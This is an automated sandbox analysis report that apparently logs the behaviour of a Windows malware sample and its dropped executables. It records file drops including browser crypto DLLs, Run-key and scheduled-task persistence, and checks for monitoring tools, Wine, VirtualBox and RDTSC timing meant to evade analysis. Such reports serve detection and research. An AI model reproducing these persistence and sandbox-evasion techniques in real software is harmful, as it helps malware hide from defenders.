Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\userKFHCAEGCBF.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\userKFHCAEGCBF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c593ec106.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ec8c5c339.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: FilemonClass
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: RegmonClass
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: FilemonClass
Source: C:\Users\userKFHCAEGCBF.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ec8c5c339.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ec8c5c339.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c593ec106.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c593ec106.exe	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

8_2_004195E0

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userKFHCAEGCBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\userKFHCAEGCBF.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\userKFHCAEGCBF.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443940 second address: 443944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443A9C second address: 443AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443AA2 second address: 443AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 443AA8 second address: 443ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED556h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
